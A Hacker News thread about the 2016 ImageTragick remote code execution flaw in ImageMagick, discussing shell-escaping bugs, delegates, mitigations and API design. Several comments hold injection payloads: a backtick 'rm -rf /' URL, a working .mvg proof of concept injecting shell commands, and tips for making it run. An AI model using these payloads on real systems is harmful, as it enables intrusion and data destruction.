Hacker News new | past | comments | ask | show | jobs | submit login
Remote code execution vulnerability in ImageMagick (imagetragick.com)
478 points by nthitz on May 3, 2016 | hide | past | favorite | 230 comments



So judging by this commit[1] and this line[2] I reckon you could somehow escape the "wget" command (assuming that's what it invokes here[3]). The following characters were removed in the commit: ' ', '"', "'", '`', '<', '\\', '>'.

If so then it's not complicated file formats or buffer overflows, it's an improperly escaped 'system' call being fed user input in an obscure feature that probably shouldn't have been included in the first place. Party like it's 1999 guys.

Edit: I'm pretty sure this is an RCE issue. This function[4] replaces the placeholders in the wget command, which is this: `wget -q -O "%o" "https:%M"`

So seeing as %M is user controlled we can feed it a URL like "//hacker.com/`rm -rf /`" and it will blindly pass it to the shell. Wow.

1. https://github.com/ImageMagick/ImageMagick/commit/a347456a1e...

2. https://github.com/ImageMagick/ImageMagick/blob/e93e339c0a44...

3. https://github.com/ImageMagick/ImageMagick/blob/e93e339c0a44...

4. https://github.com/ImageMagick/ImageMagick/blob/32bdefdc31f1...


Explain to me like I'm 5 years old: why is an Image utility invoking shell code and other applications?

Shouldn't this type of utility rather be a library if it's to be used from other applications such as web apps?


ImageMagick shells out to "delegates" to convert to/from many of the formats it supports: reading in a PDF results in a call to "gs", reading in a .docx results in a call to "soffice --headless", etc.

As for the wisdom of this approach...


This must expose an absolutely massive attack surface. Time to disable all these "delegates".


It's really a command-line tool at its heart. The library is essentially just a wrapper around this command-line tool.

You could feasibly do the same stuff in an interpreted language, but (I suspect) it would be substantially slower than directly running those compiled command-line tools underlying it.


> The library is essentially just a wrapper around this command-line tool.

That sounds bass ackwards if you ask me. A command line tool is usually a thin wrapper around a library, for a reason.

I realize it might seem crazy to duplicate functionality from gs into your library, but then the tool should link against those code bases as libraries instead of calling some gs executable (which of course in turn is just a wrapper around a gs library and so on).

Making a library call to re-scale an image or convert from formatA to formatB shouldn't be a shell execute call to begin with, and it shouldn't be making any shell exec calls of its own.


> That sounds bass ackwards if you ask me. A command line tool is usually a thin wrapper around a library, for a reason.

It's historically grown. The tool came first, the library was tacked on later.

And yes, it's a mess. That's why the much saner GraphicsMagick was forked off it… in 2002. People just never migrated.


GraphicsMagick is pretty lacking in terms of features compared to ImageMagick though, even to this day. I tried using it in a project that had just slightly unconventional image processing requirements and GM just didn't have the capabilities to handle it, whereas ImageMagick did.


It is a bit backwards, yes. As other users pointed out, this is for historical reasons.

That being said, I wouldn't be surprised if porting those things over from compiled languages to be a part of the library would prove to be substantially slower. For high-volume applications, it would very possibly make the library totally unusable.

I agree that it's a backwards way of doing things in a perfect world, but the perfect is the enemy of the good. Sometimes you've gotta make compromises for reality's sake.


> That being said, I wouldn't be surprised if porting those things over from compiled languages to be a part of the library would prove to be substantially slower.

I must have missed something, I thought ImageMagick was a collection of C libraries and C programs, which in turn occasionally called other libraries and programs (such as gs).

What I meant was that a graphics utility should be a c library that exports functions like

    scale_image(source_image, target_image, scale) 
to be used instead of running a command line utility

    convert image.jpg -resize 0.5
That can't ever be slower, but some times likely faster (e.g. to recode an image before inserting as a blob into a db or sending over a netwoek you wouldn't even write it to disk).


It's both a library and a series of command-line tools.


So is git, nuget etc. Either something is just a library, or it's just a command line tool, or it's a command line tool that uses a library (i.e. the command line tool is a simple wrapper that turns command line arguments into function call parameters basically).

I have never heard of a program where the command line program is at the heart, and a library is wrapped around it. I can't even imagine how such code would be structured.


Because we can never just let documents simply be documents.


ImageMagick shouldn't have been using /bin/sh or system() in the first place. Instead it should use fork+exec or libpipeline.

http://bonedaddy.net/pabs3/log/2014/02/17/pid-preservation-s... http://libpipeline.nongnu.org/

I expect there may also be option injection vulnerabilities in the code.

http://www.defensecode.com/public/DefenseCode_Unix_WildCards...


Both don't exist on non-POSIX systems, like NT. ImageMagick supports those natively, however.


So? Use CreateProcess on NT then

Edit: Actually it already does: https://github.com/ImageMagick/ImageMagick/blob/master/Magic...


It seems like CreateProcess uses the one-long-string for the command rather than the POSIX model of one string per argument. Is there any way to run a process on Windows using one string per argument?


Actually, it's (normally) two strings, one for the program image filename and one for the command tail.

* https://msdn.microsoft.com/en-gb/library/windows/desktop/ms6...

A single command tail is the Win32 model at base, as it was the DOS API model before it. (The OS/2 model was multiple command tails, although in practice most programs read no more than just one.) exec*() implementations are layered on top of this, and the argv[] notion is a shared fiction maintained by the runtime libraries of C and C++ implementations.


Security is a spectrum, beware of falling into a https://en.wikipedia.org/wiki/False_dilemma


ISTR NT has other mechanisms for that.


I'm sure there's buffer overflows in ImageMagick - probably lots of them - but yeah, you definitely don't need them. ImageMagick has been so buggy for so long, i'm pretty sure an accidentally corrupted image of a kitten sitting on a dog's head would gain root, dump your database and mail it to full-disclosure.


Perhaps a silly question, but if address space layout randomization (ASLR) is enabled, should it no protect against buffer overflows?


It protects against trivial ones, but advanced buffer overflows can work around ASLR and other protections.


That's where I'm a little confused. Some of the changes (like the ones you've called out here) look pretty clearly like they're designed to counteract maliciously-constructed filenames, but the PR-type page talks instead about testing magic numbers as the way to avoid the issue.

This one [1] seems to deal with ImageMagick's feature that reads the contents of a file into the command line: "The special character '@' at the start of a filename, means replace the filename, with contents of the given file. That is you can read a file containing a list of files!" Again though, that's a filename-based problem, not something you'd use magic number checking to defend against.

Edit: I guess with the "@filename"-based one, you could defend on the basis that the payload will be a text file of filenames, but that seems rickety at best.

1: https://github.com/ImageMagick/ImageMagick/commit/58a2ce1638...


I think they mean use the magic numbers so you can limit to common file formats like jpeg/png/gif/bmp/tiff/etc instead of just dumping everything to imagemagick, which has the side effect of allowing "weirder" things like MVG/MSL which are imagemagick-specific macro languages which let you do things like wget a remote URL.


I get the general idea of doing that, and it makes sense, but it doesn't seem to necessarily match up with what's in ImageMagick's commit history or in their forum post... but would make sense with using the "weird" formats as the initial payload, I suppose.

In particular, ImageMagick accepting MSL directly into convert seems like an extremely straightforward exploit path, so much so that it actually seems unlikely. Their documentation makes it seem like it's designed to use a separate command "conjure," but... some combination of factors is at play here, anyway.


So, given the details now, it seems that the reason the IM commits don't seem to match up is that they didn't really squarely address the problem (in my understanding).


There is no excuse for shell escaping bugs like this. 100% safe and reliable shell escaping is trivial:

s/'/'\''/g

s/^/'/

s/$/'/


Can you provide a demonstration for why this is adequate? It seems like it might still possible to get single quotes in the input to be interpreted by the shell by putting a backslash in the input.


See the man page for a POSIX-compliant shell, like dash[0], and find the section on single-quoted strings. For example:

> Enclosing characters in single quotes preserves the literal meaning of all the characters (except single quotes, making it impossible to put single-quotes in a single-quoted string).

Note also the following examples, with double-quoted strings:

  $ echo a b c
  a b c
  $ echo "a" "b" "c"
  a b c
  $ echo "a""b""c"
  abc
  $ echo "a" b "c"
  a b c
  $ echo "a"b"c"
  abc
The same concatenation rules apply to single-quoted strings. So, by putting single quotes at the beginning and end of a string, you only need to worry about single quotes within the string. You can "escape" those with '\'', where the first single quote terminates the preceding single-quoted string, the backslash+single-quote pair is a literal unquoted/escaped single quote in the shell, and the final single quote begins single-quoting again for the rest of the string. The three parts are then dequoted and concatenated together back into your original string by the shell.

http://linux.die.net/man/1/dash


I knew about the concatenation rules, but I was missing the fact that backslash does nothing in single-quoted strings.

  $ echo 'hi\'
  hi\


The shell doesn't interpret double-backslash in a single-quoted string. Therefore, this will indeed do.


`` can invoke subshells


Thar she blows. I've updated my comment, seems like that's the RCE.


wait, why wouldn't you want your image processing library to have the ability to run random processes / shell commands? Oof.

In the meantime, maybe a DONT_RUN_COMMANDS ifdef around every call to fork/system/exec is merited...


fork() and exec() are fine. As long as you aren't running arbitrary binaries, it's pretty hard to mess up (as far as RCE goes). system(), however, is a RCE foot-cannon just waiting to happen. Don't ever use system() unless every argument is static. And even then think long and hard.


libpipeline is a good replacement for the more complex uses of system():

http://libpipeline.nongnu.org/


Thanks for linking to libpipeline; I didn't know about it. The API looks good. However, since it is licensed under the GNU GPL (the initial version was based on code in GNU troff) non-copyleft libraries like ImageMagick are unlikely to adopt it.

If you are looking for a small, standalone, non-copyleft alternative, the closest I can think of is the [exec] command in the Jim Tcl [1] embedded scripting language.

Here is an example (without the error checks you'd have in production code):

  #include "jim.h"

  int main(int argc, char const *argv[])
  {
      Jim_Interp *interp;
      int error;
      Jim_Obj *cmd;

      interp = Jim_CreateInterp();
      Jim_RegisterCoreCommands(interp);
      Jim_InitStaticExtensions(interp);

      // The input redirect below does *not* invoke the POSIX shell. It is handled by Jim Tcl itself.
      cmd = Jim_NewListObj(interp, NULL, 0);
      Jim_ListAppendElement(interp, cmd, Jim_NewStringObj(interp, "exec", -1));
      Jim_ListAppendElement(interp, cmd, Jim_NewStringObj(interp, "awk", -1));
      Jim_ListAppendElement(interp, cmd, Jim_NewStringObj(interp, "1", -1));
      Jim_ListAppendElement(interp, cmd, Jim_NewStringObj(interp, "<", -1));
      Jim_ListAppendElement(interp, cmd, Jim_NewStringObj(interp, "/etc/passwd", -1));

      error = Jim_EvalObj(interp, cmd);
      if (error != JIM_ERR) {
          printf("%s\n", Jim_String(Jim_GetResult(interp)));
      }

      Jim_FreeInterp(interp);
      return error;
  }
While I am a fan of the language and of the "hard and soft layers" approach in general [2], it is a commitment: it requires you to embed the language runtime in your program and learn the basics of the scripting language itself and its C API. The upside is that Jim Tcl's [exec] works on Windows, too (and you get other goodies with Jim like a fast, high quality implementation of strings and hash maps).

Alternatively, you can use the "big" Tcl [3] as a C library. It's larger but more mature and is available in every major Linux distribution.

[1] http://jim.tcl.tk/fossil/doc/trunk/Tcl_shipped.html#_exec

[2] http://c2.com/cgi/wiki?AlternateHardAndSoftLayers

[3] https://tcl.wiki/2074


To elaborate on the above a bit, for me the choice between Jim Tcl and the "big" Tcl 8.x comes down to choosing between vendoring the dependencies and embedding the runtime (Jim Tcl) vs. using the distribution libraries and extending the runtime (Tcl 8).

Either way you get a very fine C library that prevents you from succumbing to Greenspun's tenth rule, so I can only recommend it for most C programs and libraries of sufficient size and complexity.


Jim Tcl is available in the distros; at least Debian, Ubuntu, OpenBSD, FreeBSD, NetBSD, openSUSE, Source Mage, Fedora and Gentoo have it.


Oh yes, it is pretty widely available. What I meant was that it was smaller and easier to vendor: for example, you can produce an SQLite-style amalgamation file for it.


Embedding other languages in C seems like a path worse than system(). You are better off just writing in another language completely.


In my opinion Tcl really straddles the line between a language and a library. I've heard it favorably compared to GLib. When used from C it feels a lot more like a library than other scripting languages do (Tcl 8 even more so than Jim due to a greater C API surface).

I agree with you on writing in another language but presumably you wouldn't be considering libpipeline anyway unless you had to write C. My default approach when I need C to access some API is to write an extension to an interpreter from which to access it. I leave embedding an interpreter in C for when you can't do that.


PoC: save as file.mvg and then run convert file.mvg o.png

viewbox 0 0 1 1 image over 0,0 0,0 'https://test/" && touch /tmp/hacked && echo "1'


This is what I get on an unpatched staging server. Not sure it did anything...

    $ sudo convert file.mvg o.png
    convert.im6: delegate failed `"curl" -s -k -o "%o" "https:%M"' @ error/delegate.c/InvokeDelegate/1065.
    convert.im6: unable to open image `/tmp/magick-Yjc5q9f1': No such file or directory @ > error/blob.c/OpenBlob/2638.
    convert.im6: unable to open file `/tmp/magick-Yjc5q9f1': No such file or directory @ error/constitute.c/ReadImage/583.


if https://test can't be opened by curl then the rest of the commands will fail because they are chained by &&. if you change the first && to || then it will work.


I assumed that "bug" was added intentionally as a script kiddie deterrence...


Can confirm that I was able to reproduce after tweaking some of the special characters in the above PoC.


Works for me (with a slight bugfix to the .mvg) :O

The policy.xml workaround mentioned here seems to stop it https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2016-3714


You can trigger the code execution by just using "less" on the mvg file, as it uses ImageMagick if it's installed :)


Replace `test` with `example.com` et voila.


Full story by one of the 2 finders on the oss-security@openwall mailing list: http://www.openwall.com/lists/oss-security/2016/05/03/18


Would recommend reading the mailing list entry above...it has much more detail than the imagetragick.com site. The "unescaped shell characters" is only one of many issues.


Apparently Paperclip library already covered this long before this vulnerability is published.

https://github.com/thoughtbot/paperclip/issues/2190#issuecom...


Well, they check the filetype. I wouldn't be so certain that covers all the bases. Read this: http://www.openwall.com/lists/oss-security/2016/05/03/18


Of course I would like to see specific tests that covers everything about this vulnerability. I see now that there are more problems than the one mentioned in the article.

But the link submitted to hackernews specifically mentioned "magic bytes" which is the file type problem. I think Paperclip is not affected on that one.


I wonder if the same issue exist in GraphicsMagick.

Also, I am surprised how few people have switched from ImageMagick to graphocksMagic, given that the fork happened back in 2002 and that it offers significant improvements.

http://www.graphicsmagick.org/


"it offers significant improvements." - citation needed.

It was better for a period after the fork, but the only guy working on it hasn't maintained it that well...there's a significant number of bugs in GraphicsMagick that have been there for years.


I've always chosen GraphicsMagick over ImageMagick because it has far fewer dependencies on other packages and it provides the features I want.


I've been using GraphicsMagick for a while now. Is that also affected or is it just waiting to be checked for the same bugs?


General consensus so far seems to be that GraphicsMagick is unaffected by this vulnerability.

If security is really important to you though, you should move image processing to separate isolated servers anyway, and verify magic bytes as described by this site.


Quick update: None of the 5 PoCs that were published work on GraphicsMagick for me.

I was checking magic numbers before sending files to GraphicsMagick but I'm going to go through my code again and make sure that this is always happening.


No idea, but I'd assume yes for the time being.

The Graphicsmagick code base includes 3 of the 5 coders that are mentioned (URL, MVG and MSL). 2 of those use LibXML and url.c suspiciously uses LibXML's nanoftp and nanohttp.


Any idea how to disable those coders with GraphicsMagick? ImageMagick supports a policy file to disable coders (mentioned here https://imagetragick.com/). Would need to do the same for GraphicsMagick


delegates.mgk.in file of GraphicsMagick contains this comment:

  Under Unix, all text (non-numeric) substitutions should be
  surrounded with double quotes for the purpose of security, and
  because any double quotes occuring within the substituted text will
  be escaped using a backslash.

  Commands (excluding file names) containing one or more of the
  special characters ";&|><" (requiring that multiple processes be
  executed) are executed via the Unix shell with text substitutions
  carefully excaped to avoid possible compromise.  Otherwise, commands
  are executed directly without use of the Unix shell.
I assume GraphicsMagick doesn't suffer from this vulnerability.


Perhaps not the unescaped shell characters, but that's not the only hole that was found.


+1 to this. I use GraphicsMagick too and it would be great to know.


I believe Pinterest or that site where you can sell your knitted socks did as well, don't remember.


Not sure why this got downvoted, but I seriously don't remember the name of the second site which used Graphicsmagick extensively in production on a web facing service.


Etsy?

Wasn't Flickr the biggest site using GraphicsMagick?


Yeah I think Pinterest and/or Esty were using GraphicsMagick extensively according to some technical presentation or blog post I've read a while back.


No PoC, but ImageMagick commit history might lead to some clues https://github.com/ImageMagick/ImageMagick/commits/master

edit: PoC here https://news.ycombinator.com/item?id=11624056 though I haven't ran it myself.


Wow, they seem to have terrible commit message practice. The latest commit has a message of "...", and many others only have a bug number (which leads to an annoying usability issue on the github UI - I click the title to get to the commit - which now links to a GitHub issue).

[EDIT: Actually, 8 of the commits top of tree as of writing are "...". wow.]

On top of that, "Second effort to sanitize input string" at [1] appears related to this issue, and doesn't have a single test change, even on the second attempt!

[1]: https://github.com/ImageMagick/ImageMagick/commit/a347456a1e...


Don't they use SVN? http://www.imagemagick.org/script/subversion.php

Maybe github is just a mirror

(edits - nope, looks like they changed recently. perhaps it's a reflection of developers moving from svn to git)


Could this just be due to merges that don't squash commits?


Nope, a very quick check shows very little merge activity - the occasional pull request.

While I was at it, 49 commits using "..." as the message, and 8520 commits with absolutely no message at all.


I didn't realize you _could_ do a git commit without a message. Interesting, even if I can't think of why I'd ever want to.


For Heroku, which has a read-only filesystem for /etc, we did this: https://gist.github.com/yanowitz/8329d8b27d8294ca7027f504326...


It seems that heroku already took care of this security problem for us. This is a copy-and-paste of a comment that was left on the github page:

seems to be the default on heroku already:

  Path: /etc/ImageMagick/policy.xml  
    Policy: Coder  
      rights: None  
      pattern: EPHEMERAL  
    Policy: Coder  
      rights: None  
      pattern: URL  
    Policy: Coder  
      rights: None  
      pattern: HTTPS  
    Policy: Coder  
      rights: None  
      pattern: MVG  
    Policy: Coder  
      rights: None  
      pattern: MSL


Am I right then in assuming then that for apps deployed on heroku that this specific reported issue is not a problem?


Well, I am on heroku and I have verified that that file is on my heroku instance, so I assume so.

Is there a tool I can use to verify that my website is protected?


Oh, this is scary. Drupal and Wordpress rely on Imagemagik. The amounts to a huge amount of the internet as a whole.


What doesn't? Imagemagick, for me, is the one stop shop for all kind of image filters, resizing, recoding, etc


It's weird. I had to do commandline image manipulation in big batches several years ago. There were two options, netpbm and ImageMagick. I ended up using netpbm (and it's still my preferred solution) after ImageMagick proved to be buggy and much much slower. It always surprised me that people flocked to ImageMagick after that.

I'm completely unsurprised about these bugs given the number of serious problems I ran into. Granted, that was something like 17 years ago, but these veteran projects have a tendency to hang around on life support for decades. Projects that are huge messes don't generally get cleaned up without massive outside pressure (see: openssl).


>It always surprised me that people flocked to ImageMagick after that.

It's an SEO thing. Searching "resize image" would almost always lead to ImageMagick examples that would work well enough to not require looking elsewhere. Almost every time I've used it, it's been for a few simple image operations (downsize, rotate, etc) that happen once on a user upload of a tiny site so performance wasn't a concern.


I've used GM more. For whatever reason I've had quite a few weird problems and performance issues with IM. (It's been quite a while, though.)


Not true, both use the GD library.


To expand on this; they both use GD by default, as it's the most widely-installed library with PHP extensions available out of the box.

But both have plugins/modules that you can use to switch the library to ImageMagick very easily, and some plugins/modules would require ImageMagick for specific functionality.


WordPress uses ImageMagick if available, or falls back to GD (so technically GD is the minimum requirement). This does affect WP.


Yeah a huge number of frameworks do, as well as handcoded php sites.

I work at a hosting company, really hoping this PoC is more complex than is implied in the post. So few people actually patch/update their boxes with any degree of regularity.


I'm aware of a (now defunct) social networking site that used this for creating various image thumbnails and previews. Wouldn't surprise me that there are others.


I wonder what Imgur uses


People might be surprised how commonly used ImageMagick is. This could have a real world impact on a number of projects and services.



The particularly interesting piece to me is the SVG exploit. ImageMagick apparently will try to load xlink'd images referenced from within the SVG and hit the same problem as in the MVG example.

No skin off anybody's nose if they have to block MVGs, but SVG could be somewhat of a loss.


We are currently facing the issue of not being able to use MSVG (ImageMagick's internal SVG renderer). We use it to work around issues with RSVG.

If anyone has a solution for disabling xlink'd images but retaining the rest of MSVG functionality, we'd be all ears.


The "policy.xml" mitigation mentioned in the link (absent MVG, which is required to use MSVG) does seem to fix the specific remote execution bug being discussed here, just because the https delegate can't be used.

But, it doesn't resolve the problem that the internal renderer can be used to read local files and include their contents in the rendered image through the xlink:href. It's not clear to me that there's any way to disable that. The ImageMagick forum post gives an additional policy entry to "prevent indirect reads" but it doesn't seem to have that effect (unless it also requires an updated ImageMagick).

Edit: It... maybe... looks like the "indirect reads" mitigation was very narrowly targeted at the CVE-2016-3717 PoC using "label:@" but that's far from the only way to do local reads once you've got ImageMagick parsing "URLs" inside your input file (hint: there's a txt: coder). I'm honestly not totally sure what that policy is intended to do...

Edit 2: Well, it appears that the "prevent indirect reads" policy does indeed require an updated ImageMagick: "Denying indirect reads with a path policy and a pattern of "@*" is supported in ImageMagick 6.9.3-10 and ImageMagick 7.0.1-1 for those that need to utilize the MVG and MSL coders." I haven't used that version but I still think, judging from what it looks like, that it won't really solve the problem.


We ended up mitigating by sanitising tags+attributes, and validating all xlink:href's in the SVG-XML, using a library like bleach (https://github.com/mozilla/bleach) before passing to ImageMagick.

Probably not a bad thing to be doing anyway.


Has anyone determined if Python Wand is affected also? http://wand-py.org

Edit: Or any other libmagickwand based project for that matter.


Hard problem now: Find all places where ImageMagick is being used and no one knows about.


Given pain to set up ImageMagick it probably cannot go unnoticed anywhere. Tried to use that crap as a library not so lately, but it gave me brain cancer. I sticked to libgd finally, as that is a library, no setup to /bin, /etc, or on Windows to C:\Progra~1, and the library entry points of GD don't look as if designed by an oh-so-funny idiot on the spectrum.

http://www.imagemagick.org/script/magick-wand.php

MagickWandGenesis(); contrast_wand=NewMagickWand(); status=MagickReadImage(contrast_wand,argv[1]);

Tell me please, that this is a sane API, but then please provide me your github account as well, just to know what to avoid at all costs in the future

Edit: USE LIBGD: http://libgd.github.io/ it has friendly API, suggesting sane developers, and the API is easy to use from wrappers (I used with P/Invoke interop from C# without any hickups). It looks to me that it was designed in a way to be easily usable that way, which suggests design, not just growing code like cancer.


That's easy. Replacing all the hoards of other handwritten input parsers with formal parsers is the task at hand.

The new bounty will be for proofs of input parser correctness, not exploits.


Also make sure you don't use it for any image formats that are processed by logic with the complexity of a small command-line interpreter. You'll risk a lot of XXE vulns with formats like SVG or MVG. To see some examples of said logic, have a look at 'convert -list delegate', for example.


Shouldn't there also be the HTTP coder included also? <policy domain="coder" rights="none" pattern="HTTP" />

Also - would an example of using a HTTPS coder be:

convert https://example.com/rose.jpg ~/rose.png


For our use case, the only input formats we need to support are GIF, JPG and PNG.

Using policy.xml to disable EPHEMERAL, URL, HTTPS, MVG and MSL is a nice start, but is it also possible to disable PDF, open office, FTP and others? Where would I find a list of all the supported coders?


I'm on my phone at the moment but try looking in the files named by the output of "dpkg -L imagemagick-common". There's a bunch of xml files and one of them specifies how all the other commands are invoked, IIRC.


The delegates.xml file looks interesting, and `convert -list delegate` lists a large number of formats that we don't need to support.

I'm not clear on the difference between a "coder" and a "delegate". Do I need to add a policy.xml entry to for each delegate?


http://nowere.net/b/res/127615.html#i129473 This russian forum may contain some clues.


Rule of the day. Ad hock parsers are the #1 infosec issue. AFL is the Killer Rabbit. The only defense is writing formal parsers on all inputs.


Does anybody have a library (prefer JavaScript) for inspecting files and extracting the file type using "magic bytes"[1]. Seems like most people probably blindly use mime-type, which appears to be incorrect and insecure.

[1] https://en.wikipedia.org/wiki/List_of_file_signatures




Would using a libmagic based tool to detect the magic bytes and content type be a valid mitigation strategy? The Node library mmmagic (https://github.com/mscdex/mmmagic) already does this.



I love that security vulenarabilities have names now. I think it's great for awareness.

But when you have magic in the software's name you could do better then ImageTragic.

... though none come to me right now


My Little Pwnie: System() is Magick

Magick: The Pwning


Most images file format are insane. And people expect to convert insane document format to images, too.

Well. What did you expected?


WordPress's Imagick Image Editor would be a problem?


First Heartbleed, then Badlock and now ImageTragick. Are bugs getting their own domains now?



It's almost like we need a site that indexes them.



Give it some GitHub pages love with a custom domain and re-submit to HN!


I looked at doing that first, but I couldn't figure out how folks could submit PRs against the markdown used to generate the site. I might just be a newb but I can't find a direct way to do it. Suggestions?


I thought the same thing. You can't sensationalize hacking in the news though without a catchy name. I see them as eventual NerdCore band names. Don't forget Shellshock.


The sad thing is, I would probably buy a Heartbleed CD


Not just their own domains, but in this case its own logo and Twitter account. Seems really bizarre to me, I don't get it.


You really don't get why the web is better off if serious bugs are given memorable, human parse-able branding that helps facilitate press coverage and raise awareness among stakeholders, rather than hiding flaws behind opaque identifiers like CVE-117293 that only a handful of people will know enough about to look into?


At this rate it seems to be leading towards a new comedy subgenre, so I'm happy with it.


Whatever helps awareness. May be it even gives a hint to people outside of tech about how bad things in security really are.


I hate this "branding of security issues" trend, I don't think it adds anything at all to the security process; but there you are.


I wonder why we are "trademarking" security issue since Heartbleed?


Easier to remember and talk about, I'm not going to remember CVE-2016–3714 but ImageTragick is catchy.


Otherwise no one cares.


So, we get it. Complicated file and network formats, handled in C code leads to these types of security issues.

We are told that Rust will save us. Glib answer - if it was going to, it already would have (and this is from someone already writing Rust code).

I hope it will lead to a change on two fronts:

1. Simpler formats for file representation and data interchange. When someone tries to add an extra bitfield option, say no. When they keep trying, get a wooden stick with "no" written on it. Part of the disease of modern computing is bloated specs.

2. Restrictive not permissive code bases. Exit and bail out early. Tell the user "file corrupted". Push back.


> 1. Simpler formats for file representation and data interchange. When someone tries to add an extra bitfield option, say no. When they keep trying, get a wooden stick with "no" written on it. Part of the disease of modern computing is bloated specs.

How is creating new image formats and getting the entire Web to adopt them easier than making more secure image decoders?

It's especially irrelevant to this series of vulnerabilities, since they work by getting ImageMagick to parse less popular image formats. Inventing new ones won't do anything to mitigate these flaws.

> if it was going to, it already would have (and this is from someone already writing Rust code).

I don't understand what this is trying to imply.


The 'Magick' in this case is less welcome when your system is pwned. Maybe less magic formats and tools will have, I don't know, less vectors for compromise.

We had better options before and after C, yet here we are. Not to piss on Rust's parade, but it may prove not to be the white knight of code hoped for. And I like Rust - I am probably just less emotionally clouded in my view point.


I don't see anything in this comment that is responsive to anything I wrote.


It is a shame, a second read may have helped.


I agree to the extent that "Rust will save us" is a glib answer, but dismissing it completely is equally silly – safe-by-default is an excellent tool to help prevent many of the common sort of vulnerabilities we see in C code.

I don't really agree with the rest. "Simple file formats" is a theoretically nice idea which is impractical – after all, features are added to file formats for a reason. "Restrictive not permissive" is, as others have pointed out, a divergence from the generally useful Postel's law. Writing a library which cannot handle common problems in file formats – of which there are a huge number, due to sloppy implementation – is a good way to ensure you have developed a library which will be used by few.


>I agree to the extent that "Rust will save us" is a glib answer, but dismissing it completely is equally silly – safe-by-default is an excellent tool to help prevent many of the common sort of vulnerabilities we see in C code.

There have been all sorts of safe languages that are appropriate for image processing and other types of programs, but people apparently like programming in C more than they like secure software. It is hard to see how something like Common-Lisp/Ocaml/Haskell/Java/Eiffel/C#/Ada wouldn't be more than up to the task, with only a slight speed penalty. It seems more like a social issue than a technical one. Maybe Rust will finally be able to break through, but I wouldn't hold your breath.


Because Rust has a C ABI and no runtime. All of the others do (except for Ada which was always niche).


By "not holding your breath" do you mean "just write your code in C?"


Regarding point 2, I think we need to consider Postel's Law a design antipattern, rather than a hallmark of good design. From now on, good software should not be permissive in what it accepts, because there is no good way to guarantee that such permissiveness will not lead to security breaches down the line.


Counterpoint: Literally the only thing that allows forward compatibility on the web is permissiveness. When a browser sees something like this in CSS,

    .foo {
      someprop: boring-old-value;
      someprop: awesome-new-value;
    }
instead of old browsers that don't understand just throwing a fit and dying, they ignore stuff they don't understand and carry on. So we know that a browser which doesn't implement 'someprop: awesome-new-value' will go ahead and read 'someprop: boring-old-value' instead of stopping processing of the CSS, or worse, emitting an error and refusing to render the page altogether. Without this, it would effectively be impossible to ship new web features until old browsers had died off to <epsilon-of-users-we-don't-care-about>.


There's a crucial distinction to be made. Ignoring unknown properties is a defined part of the CSS spec, so implementing it that way is just being correct. Postel's Law leads to trouble when "being liberal" means unilaterally extending the spec in ill-defined and ultimately incompatible ways. Example: autocorrecting "awesome-new-value" to its closest known match "alternative-old-value".


I'll agree that Postel's Law should not be interpreted as "when something doesn't fit, force it". The most effective examples tend to have a duality: areas where permissiveness is allowed and areas where it's constrained. (E.g. The CSS/JSON must be well-formed, but the properties can vary.)

Getting underneath the patterns and anti-patterns of permissiveness in an informed way is a lot more useful IMO than the knee-jerk reaction of declaring all permissiveness harmful and running away. Especially in light of the web's incredible wins via this strategy.


From a purely financial point of view, you may well be right: the technical and social benefits of clean, elegant, reliable, correct software probably don't justify sacrificing something as profitable as the permissiveness of the Web.

But these are pretty damn twisted priorities. A little bit of social responsibility wouldn't hurt.


I would disagree with that greatly. Postel's law says there's no need to excessively constrain what's considered valid input, not to ignore basic bounds checking and security.

Not following Postel's law would result in brittle system components that break when other parts of the system evolve.


>Not following Postel's law would result in brittle system components that break when other parts of the system evolve.

This depends how much graceful degradation you have available to you. In systems/domains where little is available, following Postel's law can result in silent failures rather than explicit/loud ones. The question isn't whether they break or how brittle they are, but whether you will notice whether they did break. Each system exists within a range on a continuum of how acceptable Postel's law is.


Also, just because Postel's law worked for a small group of highly skilled systems programmers implementing common infrastructure for everyone, it doesn't automatically follow that it will work for a large and fast growing group of programmers of wildly varying skill, each implementing their own or their employer's brilliant business idea.


>Not following Postel's law would reult in brittle system components that break when other parts of the system evolve.

Being liberal in what you accept is precisely the definition of brittle: if there's an update that reduces the set of representable input data, but you keep the code that processes the user's input into data, then an untested, little-used edge case could invalidate your assumptions about the rest of the system.


Additionally, being conservative in what you accept forces people to be conservative in what they emit upstream. Win-win!


Tell that to HTML engines ;P


Has any browser implementor ever given it a serious try?


XHTML?


Reply to sibling: “Did any browser reject poorly formed XHTML?” Yes, they did, if the XHTML was served with a MIME type of application/xhtml+xml.

However, this MIME type was extremely rare because MSIE would not show a web page unless the MIME type was text/html.

Furthermore, the extreme brittleness of XHTML was generally regarded as a Bad Move as one single URL in your source code with a literal ampersand instead of &amp; would cause a complete and total breakage of your web page. Of course, many web pages are crummily concatenated strings and there are a lot of web devs who would never be able to reliably generate 100% XHTML-compliant output. Shit, pasting in a snippet of HTML where the BR tags omitted the self-closing slash would break your XHTML validation.

tl;dr: Yes, and it sucked


See second reply to seba_dos1.


That wasn't serious enough. Did any browser ever reject a Web page just because it wasn't well-formed XHTML?

Basically, give people a hand, and they'll grab your whole arm. It's human nature, and Web developers aren't above it.


>Did any browser ever reject a Web page just because it wasn't well-formed XHTML?

Of course. If you served XHTML properly (by setting "application/xhtml+xml" MIME type), ill-formed XHTML would just show you a big syntax error instead of the page. Try it, that's still the case.

Even when being well-formed, lots of sites still used "text/html" type to trigger HTML (SGML) parser instead of XML one, as any 3rd party code embedded into the website would of course crash the page as well.

That was one of the reasons why XHTML never got popular and eventually has been abandoned.


That still wasn't serious enough. All it took to get browsers to accept non-XHTML pages was to change the MIME type. What I'm talking about is simply not displaying ill-formed pages at all, under any circumstances.


But with that MIME type it wasn't XHTML at all. It was being parsed as HTML which was possible only because of big similarity between those two formats. All you need to ensure the behavior you want is to disable HTML parsing (which is pretty much ensures being liberal in what the parser accepts already in its specification).


That would be madness. Imagine a browser that did that, or that crashed the tab in case of a JS error. There would be no pages left :P


And this is precisely the point. If the very earliest browsers had insisted on correctness rather than permissively accepting broken HTML (and JS - see semicolon insertion), we would not now have a situation where browsers need to do a ton of work to allow graceful degradation in the face of awful markup, simply because the tooling would have evolved in the other direction. Postel's Law gains a little temporary sender convenience in exchange for a nasty mess of permanent receiver headaches.


Postel's law has two parts. Be gracious in what you receive is what most people are talking about, but be cautious in what you send is just as important. If people are using broken markup that's the problem that needs fixing. How many web devs bother with validation anymore? (And not for app like functionality, but for what should be simple text and images with a few menus - why are so many newspaper websites so awful?)

https://tools.ietf.org/html/rfc793

    2.10.  Robustness Principle

